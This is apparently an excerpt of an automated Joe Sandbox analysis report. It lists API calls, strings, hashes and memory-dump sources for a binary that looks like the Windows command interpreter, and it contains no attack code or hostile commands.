• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
• String ID: :$:$:$:ON$OFF
• API String ID: 972821348-467788257
• Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction ID: a1cad378b9ebd1b9c19244478a5c33789b3475cf11d36777d6b64c224af23755
• Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
• Instruction Fuzzy Hash: E1229222A0868B86FB66BF21951427DF6A1EF45B80FC98077D90F473B4DEBDA4448370

Control-flow Graph (legend: Executed / Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: InfoLocale$DefaultUsersetlocale
• String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
• API String ID: 1351325837-2236139042
• Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction ID: 2cfb79a8ca0fe75f2f9909264f8608b2b5a74e7f4394c3e4601b634e09182452
• Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
• Instruction Fuzzy Hash: 20F15966B1864B85FB11AF11E9102BDA2A5BF05B84FE44177DA1F836B4EFBCE505C320

Control-flow Graph
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
• String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
• API String ID: 388421343-2905461000
• Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
• Instruction ID: 84bd1d350d77b01b83f0786bfcac9955e31c9004c3aea83c9bf83a4dcce896ce
• Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
• Instruction Fuzzy Hash: 5EF13B32A18A8B85FB60AB01E4543BEF6A0FB85780FD44176D94F82675DFBCE445CB60

Control-flow Graph
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: QueryValue$CloseOpensrandtime
• String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
• API String ID: 145004033-3846321370
• Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
• Instruction ID: 49f0bba741916081369efb74f02044f29ac6390f18ffb8293604677542a470ee
• Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
• Instruction Fuzzy Hash: 6FE13826529A8BC6F760AB10E4501BEF7A0FB99744FD05137EA8F42A64DFBCD544CB20

Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2624720099-1920437939

Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 873889042-0

                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524D9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15258E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7D153C6DB), ref: 00007FF7D15258EF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524DBB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1524DCA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1524DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E04
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D1520589
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: SetConsoleMode.KERNELBASE ref: 00007FF7D152059E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D15205AF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: GetConsoleMode.KERNELBASE ref: 00007FF7D15205C5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D15205EF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: GetConsoleMode.KERNELBASE ref: 00007FF7D1520605
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D1520632
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: SetConsoleMode.KERNELBASE ref: 00007FF7D1520647
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7D1524E35), ref: 00007FF7D15255DA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525623
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525667
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D15256BE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525702
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E35
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E81
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524F69
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524F95
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FB0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FD8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FF8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525037
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152504B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D15250DF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D15250F2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152510F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525130
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152514A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525175
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1049357271-3021193919
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5c24d3ad9e99063f81465f73adbbd424b272087df19e895f3499b647153850e2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12C16B62A18A4B86FB04BB11E8141BDF7A1FF89B91FD48176D94F433B1DFBCA4458260

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1809961153-336475711
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 734ef4eb37dd310d376e711d0a2030d3fc9247bb3473ba6da7b1b02340b469a4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25D11A23708B8A91FB60AB15E4442AEB7A1FB89740FC44176DA4F836B5DFBCE544C710

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2622545777-4197029667

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1606018815-3025314500

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: ConsoleTitlewcschr
• String ID: /$:
• API String ID: 2364928044-4222935259
• Opcode ID: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
• Instruction ID: e2ca0c16b49d53aeb54f77df9532cc4c6649e3e8c7334f42884c1fbeddce7399
• Opcode Fuzzy Hash: 8e1374b0c85c3997ae108a920788d038497e0ecf6712f1d7bde5348e2c3bef55
• Instruction Fuzzy Hash: 9CC18C62A1864B81FB65BB15A4542BDB2A1AF41B90FC64132D91F472F5DFBDE884C330

Control-flow Graph (first node: 7ff7d1528d80-7ff7d1528da2)
APIs
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
